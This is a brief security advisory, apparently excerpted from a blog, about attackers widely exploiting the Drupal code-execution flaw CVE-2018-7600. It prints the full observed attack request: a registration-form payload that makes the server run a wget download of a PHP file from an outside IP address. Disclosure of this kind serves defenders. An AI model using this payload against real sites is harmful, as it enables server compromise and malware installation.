Widespread Drupal Arbitrary Code Execution
Date of Detection: 2018.3.29 Attack Pattern: URI: /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax Request Body: form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec& mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php Target System: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code. Analysis: This issue is not a zero-day vulnerability and assigned as CVE-2018-7600. However, attackers are scanning and Read more about Widespread Drupal Arbitrary Code Execution[…]